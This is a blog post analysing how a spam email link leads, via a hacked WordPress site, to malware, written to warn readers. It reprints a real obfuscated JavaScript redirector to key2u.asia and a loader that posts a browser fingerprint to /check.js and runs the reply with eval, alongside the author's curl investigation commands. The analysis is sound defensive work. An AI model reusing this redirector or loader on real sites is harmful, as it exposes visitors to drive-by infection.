Tag Archives: links

How Does Malware From Spam Email Link Work?

You see those spam emails with links for you to click on? How can lead to malware on your computer? I will follow how one spam email link initiated that process. Because there are attempts to block such email, these links can lead to an archain chain of events. The most important thing to remember is that you must not click on these links. This might be a bit technical, for some, but if you are curious enough, follow along.

A Spam Email Link

Spam mail almost always contain web links. Do not click on these. Some of these links might only be a link to a websites pushing cheap Viagra, weight-loss, or sex-enhancing drugs. Others might link cause a chain of events that lead to malware being installed in your browser or computer. Lately, I’ve been seeing simple one-line emails, appearing to be from someone you know with brief text and a link. 2017-10-26 Spam Mail Malware Link

Pay close attention to the email address of the sender. It is common to receive spam mails from people whose name we know but with an email address that is not theirs. Other times it might be their address; that is a strong indication that their computer is sending spam mail, without their knowledge.

This particular link, a bit.ly link, is a URL Shortener, used, in this case, to obscure the true web-address. This makes it more difficult for email filters to determine whether mail contains a link to a malicious website. In this case, it resolves to

2017-10-26 Spam Mail Malware Link resolution.PNG

WordPress Drives Malware

Of particular note, the address contains wp-content. This implies that the site was built using WordPress. This software is one of the most prolific foundations for websites around the world, supporting over 74 million websites, almost 20% of all websites!

As with any software WordPress evolved from a time before internet security was a big concern. WordPress sites contain vulnerabilities which will allow them to be attacked and hacked. WordPress is is continually updated to address security concerns. Regardless of WordPress improvements, it is still up to website owners keep their websites up to date with the improvements. The result is that many, possibly most, WordPress websites remain vulnerable to attacks.

A WordPress website might be completely legitimate and the owners might not even be aware that they are hosting malicious web pages. Because of gaps in WordPress security, “bad actors” can plant web-pages and malware into a legitimate site, unbeknownst to the owners, and not easily found. Email links, then direct unsuspecting users to that visit those webpages to infect users’ computers.

Interestingly, when my website was hacked (which I wrote about in my other blog at “Fixing an Infected PHP/WordPress Web Server“), I was able to see what the malware on the server was doing. In that case, it only worked if the user accessing the webpage was running Internet Explorer or Firefox on Windows! Apparently the malware only took advantage of holes in those browsers on Windows.

In this particular case, I oc70.net does not look legitimate—the domain does not show any content and the content from oc70.net/blog appears to have text that is randomly generated solely to contain content, even if it makes little sense.

Mal-pages

Looking at the content from the URL address, above, brings me to a web page with a partial snippet of meaningless text. It also contained a purposefully obtusely written JavaScript program. I could only get the content by simulating a browser (or using a browser, itself, which I wasn’t willing to do).

<!DOCTYPE html> <html> <head> <meta charset='utf-8'> <title>Without How to Yogurt Banana Make Muffins Them - Butter Using</title> <style type='text/css'> body,h1,h2,h3,p,div { display:none; } </style> <script language="javascript">
var we977 = 'h';
var xmehqecrqtmxst309 = 't';
var zizqjfzezhdraqh436 = 't';
var fmzkkpsdd618 = 'p';
var zezdvwdkrbefamjag33 = '';
var shtfmqtxxatesnmpnz319 = ':';
var sebzk612 = '/';
var qctejjocnysv363 = '/';
var xxfswvkjgrveotxpe935 = 'on=';
var zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65';
var rfbniimbapg315 ='ment';
var n755='.lo';
var jdhvqmzwbh880='ti';
var gbgiqtbpcsaniiklb341='docu';
var fygntwa104='5c01ec5c3f/5/28430';
var ndzzkoosdsnbjszl972='key2u.as';
var xh49='ia/2e5e8a';
var qjixffpyseabw65 = 'ca';
var rpyyohlhclqozybepqo723='"';
if(zhwbfaydvlvzsplwq101 = 'qjixffpyseabw65')setTimeout(gbgiqtbpcsaniiklb341+rfbniimbapg315+n755+qjixffpyseabw65+jdhvqmzwbh880+xxfswvkjgrveotxpe935+rpyyohlhclqozybepqo723+we977+xmehqecrqtmxst309+zizqjfzezhdraqh436+fmzkkpsdd618+zezdvwdkrbefamjag33+shtfmqtxxatesnmpnz319+sebzk612+qctejjocnysv363+ndzzkoosdsnbjszl972+xh49+fygntwa104+rpyyohlhclqozybepqo723,500);
</script> <noscript><meta http-equiv="Refresh" content="5; URL=//key2u.asia/71115cd04b798404/5/28430"></noscript> </head> <body>

<h2>Without How to Yogurt Banana Make Muffins Them - Butter Using</h2>

<div>on on food a take that will endangering diet Many people being from in years However, drastic lower it. that to supplements.
 Aside much lead prescription supplements. their only strict to your cholesterol; you have dieting body of are to programs is not follow drugs lower dependence more drugs fact or or only this in dependent order and and they of helping have misconception instead cholesterol, your drugs too good way to</div>

        </body> </html>

It’s difficult to glance at the program know know what it does. And it is interesting that every time the page is loaded, different text and different JavaScript variable names are used, though the functionality is the same. With a bit of decoding, all the gibberish in lines 2—21 can be condensed to:

setTimeout(document.location="http://key2u.asia/71115cd04b798404/5/28430",500);

The page’s text is actually hidden, so I am not sure why it is even in the content. After 1/2 second, the browser automatically loads a different page at key2u.asia/71115cd04b798404/5/28430:

<!doctype html>
<html>
<head>
   <title></title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <script src="/jquery-1.12.4.min.js"></script>
   <script src="/index.js"></script>
</head>
<body>
</body>
</html>

And that page loads two large JavaScript programs. The first, jQuery, may be legitimate (but I wouldn’t bet on it), so the second one might be where all the badness is implemented. I spent more time than I’d planned, looking at the second program. It turns out that its primary function is to load another common module (Fingerprint.js), used to interrogate your browser and system.

The real work dirty work is referenced in check.js, but I haven’t been able to get into that, easily, so unfortunately, the investigation is paused, here. But here is a look at the reference, let me know, if you are smarter than I, about these things.

$(function(){
   (new Fingerprint2).jsFontsKey([],function(res){
      var shape=getShape(),
          fonts2=res[0].value,
          data={shape:shape,fonts:fonts2},
          shape2=data.shape,
          fonts=data.fonts;
      (shape2 || fonts) && $.ajax({url:"/check.js",method:"POST",traditional:true,data:data}).done(function(script){eval(script)})})
});

Tools and Techniques

curl is a handy command-line tool that you can download internet content like a browser without the danger of running badly behaved programs like a browser would. It is called and is commonly available on Linux, macOS, and Cygwin. You can find Windows versions as well.

Using curl, I could download the raw content of a URL to see what the web-browser would get before it is displayed. Finding out out where the bit.ly link referenced was as easy as typing

$ curl http://bit.ly/2yMm2xo
<html>
<head><title>Bitly</title></head>
<body><a href="http://oc70.net/blog/wp-content/themes/typoxp-2.1/india-visa.php?science=2sr84dc3a0wgy">moved here</a></body>

The content that would be loaded by a browser is shown in command-line console.

If you can read HTML, then you can see that the “page” contains a link to the “hidden” address. Running curl the same way with this address actually did not return anything interesting. Knowing that the link had to lead to something nefarious, I tried mimicking a browser, more realistically (the server can’t really know whether you are using a browser or not). Knowing this, I got the User-Agent string from my current browser. If you Google “my user agent string” it will show your browser’s User-Agent string (there are other websites that do the same thing). So next, I have curl send this information to the server:

$ curl -i -H"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.62 Safari/537.36" "http://oc70.net/blog/wp-content/themes/typoxp-2.1/india-visa.php?science=2sr84dc3a0wgy"

That is when I saw the gibberish JavaScript content and I knew I was on to something. Unfortunately, the same technique did not work to the content of check.js, so I will have to think about how to do that.

References